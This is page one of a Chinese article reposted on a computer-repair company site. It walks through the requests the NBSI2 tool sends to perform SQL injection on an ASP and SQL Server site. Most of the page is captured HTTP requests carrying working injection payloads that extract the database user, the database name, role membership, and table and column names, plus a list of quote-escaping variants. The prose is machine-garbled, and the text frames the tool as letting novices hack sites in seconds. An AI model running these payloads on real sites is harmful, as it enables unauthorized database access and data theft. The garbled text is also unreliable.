设为主页 | 加入收藏 | 繁體中文
当前位置:首页 > 新闻中心 > 行业资讯 > 安全防护 > 安全工具

NBSI2内部功能实现大揭谜

  作者:虚空 来自:www.csdn.net
  前段工夫SQL注入很流行,用过小竹的NB2的人大概都晓得,这个东西靠近无敌,菜鸟用了它也能数秒把一个站给黑了,但是不相识其中的注入历程 可以说永远都进步不了吧~~
  首先声明,我也只是菜鸟一个,恰好最近在研讨SQL,任意把NB2的注入历程给研讨了一个,所用东西wse,信赖各人不会陌生的,网上到处有得下,我给一个地址,http://www.gxgl.com/soft/WSE06b1.zip,这是一个用来监督和修正网络发送和接收数据的步伐,可以用来资助您调试网络使用步伐。
  空话少说,开工,先在网上任意找一个有SQL注入漏洞得站点www.testdb.net,找到一个注射点:http://www.testdb.net/article_read.asp?id=80
  呵呵,www.testdb.net这个网址固然是不存在了。
  历程一、取得SQl Server数据库信息
  翻开nb2,输入地址:http://www.testdb.net/article_read.asp?id=80,选择"get"方式,点"检测"按钮,
  取得SQl Server数据库得如下信息:
  多句执行:未知
  子查询:支持
  当前用户:test
  用户权限:DB_OWNER
  当前库:testdb
  用过nb2的人应该都很熟习下面的内容把~~
  %20解释为空格 %2B解释为+号,%25解释为%号
  HTTP/1.1 200 OK     //前往乐成
  HTTP/1.1 500 Internal Server Error
  用wse检测Get包信息,如下:
  GET /article_read.asp?id=80 HTTP/1.1
  GET /article_read.asp?id=80%20and%20user%2Bchar(124)=0 HTTP/1.1
  即:article_read.asp?id=80 and user+char(124)=0
  char(124)为字符'|'
  GET /article_read.asp?id=80;declare%20@a%20int-- HTTP/1.1
  即:article_read.asp?id=80;declare @a int--
  //果断是否支持多句查询
  GET /article_read.asp?id=80%20and%20(Select%20count(1)%20from%20[sysobjects])>=0 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: articleid=80%3Bdeclare+%40a+int%2D%2D; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
  即:article_read.asp?id=80 and (Select count(1) from [sysobjects])>=0
  //果断是否支持子查询
  GET /article_read.asp?id=80%20And%20user%2Bchar(124)=0 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0;
  ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
  即:article_read.asp?id=80 And user+char(124)=0
  //取恰当前用户
  user是SQLServer的一个内置变量,它的值是当前连接的用户名,类型为nvarchar。拿一个nvarchar的值跟int的数0比力,体系会先试图将
  nvarchar的值转成int型,转的历程中一定会出错,固然,转的历程中一定会出错,SQLServer的出错提示是:将nvarchar值 "east_asp" 转
  换数据类型为 int 的列时发生语法错误,呵呵,east_asp正是变量user的值,这样,不废吹灰之力就拿到了数据库的用户名。and user>0
  GET /article_read.asp?id=80%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)
  =1 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0;
  ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
  即:article_read.asp?id=80 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1
  函数说明:
  IS_SRVROLEMEMBER指明当前的用户登录是否是指定的服务器角色的成员。
  语法
  IS_SRVROLEMEMBER ( 'role' [ , 'login' ] )
  参数
  'role' 被查抄的服务器角色的称号。role 的数据类型为 sysname。
  role 有用的值是: sysadmin,dbcreator,diskadmin,processadmin,serveradmin,etupadmin,securityadmin
  'login'
  将要查抄的登录的可选称号。login 的数据类型为 sysname,默许值为 NULL。如果未指定,那么使用当前用户的登录帐户。
  select Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124) 结果为"1|"
  GET /article_read.asp?id=80%20And%20Cast(IS_MEMBER(0x640062005F006F0077006E0065007200)%20as%20varchar(1))%2Bchar(124)=1
  HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0;
  ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
  即:article_read.asp?id=80 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124)=1
  select Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124) 结果为"1|",和下面得前往结果一样,但细致
  IS_MEMBER内里的那一长字符串和下面的不一样,不知代表什么意思,0x730079007300610064006D0069006E00转化后为"|O|@ E ",本以为
  是"sysadmin"雷同的字串,但看来不是,算了,不想了,呵呵,但我想,其作用应该是取恰当前用户的权限把,如:DB_OWNER
  GET /article_read.asp?id=80%20And%20db_name()%2Bchar(124)=0 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0;
  ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
  即:article_read.asp?id=80 And db_name()+char(124)=0
  这一句,看到有一个db_name()函数,不消多说,各人应该晓得了,db_name()是另一个体系变量,前往的是连接的数据库名。
  到次,获取SQL数据库信息的历程算是阐发完毕。
  另:post要领不再细致阐发,各人可本身看一下,下面是post要领时抓的包,具体同Get要领基本一样,主要看末了一行的信息。
  其中也用到很多本领:如下:
  id=80%20and%20user%2Bchar(124)=0
  id=80'%20and%20user%2Bchar(124)=0%20and%20''='
  id=80%25'%20and%20user%2Bchar(124)=0%20and%20'%25'='
  id=80%20And%201=1
  id=80%20And%201=2
  id=80'%20And%201=1%20And%20''='
  id=80'%20And%201=2%20And%20''='
  id=80%25'%20And%201=1%20And%20'%25'='
  id=80%25'%20And%201=2%20And%20'%25'='
  //////////////////////////////////////////////
  历程二、猜解表名
  Top1
  GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%201%20id,name%
  20from%20[testdb]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0 HTTP/1.1
  即:article_read.asp?id=80 And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from
  [testdb]..[sysobjects] Where xtype=char(85) order by id) T order by id desc)>0
  char(85)='U'
  作用是取得testdb数据库第一个表的表名,以此类推Top N,可以取得别的的表名。
  Top2
  GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%202%20id,name%
  20from%20[testdb]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0 HTTP/1.1
  ...
  TopN
  wse抓获的包信息:
  GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%201%20id,name%
  20from%20[testdb]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%
  3D0
  ...........
  //////////////////////////////////////////////
  历程三、凭据某个表名猜解列名
  表名:article
  Top1
  GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from%20(Select%20Top%201%
  20colid,name%20From%20[testdb]..[syscolumns]%20Where%20id%20=%20OBJECT_ID(NCHAR(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%
  2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%
  2BNCHAR(76)%2BNCHAR(69))%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0 HTTP/1.1
  即:article_read.asp?id=80 And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From
  [testdb]..[syscolumns] Where id = OBJECT_ID(NCHAR(101)+NCHAR(97)+NCHAR(115)+NCHAR(116)+NCHAR(104)+NCHAR(111)+
  NCHAR(116)+NCHAR(46)+NCHAR(46)+NCHAR(65)+NCHAR(82)+NCHAR(84)+NCHAR(73)+NCHAR(67)+NCHAR(76)+NCHAR(69))
  Order by colid) T Order by colid desc)>0
  作用是取得article表的第一个列的列名,以此类推Top N,可以取得别的的列名。
  函数说明:
  OBJECT_ID 前往数据库东西标识号。
  语法 OBJECT_ID ( 'object' )
  参数 'object'
  要使用的东西。object 的数据类型为 char 或 nchar。如果 object 的数据类型是 char,那么隐性将其转换成 nchar。
  前往类型 int
  NCHAR(101)+NCHAR(97)+NCHAR(115)+NCHAR(116)+NCHAR(104)+NCHAR(111)+NCHAR(116)+NCHAR(46)+
  NCHAR(46)+NCHAR(65)+NCHAR(82)+NCHAR(84)+NCHAR(73)+NCHAR(67)+NCHAR(76)+NCHAR(69)
  对应于字符串 testdb..ARTICLE
  便是:article_read.asp?id=80 And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From
  [testdb]..[syscolumns] Where id = OBJECT_ID('testdb..ARTICLE')
  Order by colid) T Order by colid desc)>0
  Top2
  GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from%20(Select%20Top%202%
  20colid,name%20From%20[testdb]..[syscolumns]%20Where%20id%20=%20OBJECT_ID(NCHAR(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%
  2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%
  2BNCHAR(76)%2BNCHAR(69))%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0 HTTP/1.1
  TopN
  ...
  wse抓获的包信息:
  GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from%20(Select%20Top%201%
  20colid,name%20From%20[testdb]..[syscolumns]%20Where%20id%20=%20OBJECT_ID(NCHAR(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%
  2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%
  2BNCHAR(76)%2BNCHAR(69))%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%
  3D0
  ...............
  //////////////////////////////////////////////
  历程四、凭据列名猜解字段内容
  字段名:Title

上一页12下一页

    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码:
  
上一篇: Telnet密码破解软件Letmein1.0说明
下一篇: ACDSee 6.0创建文件“备忘录”

友情链接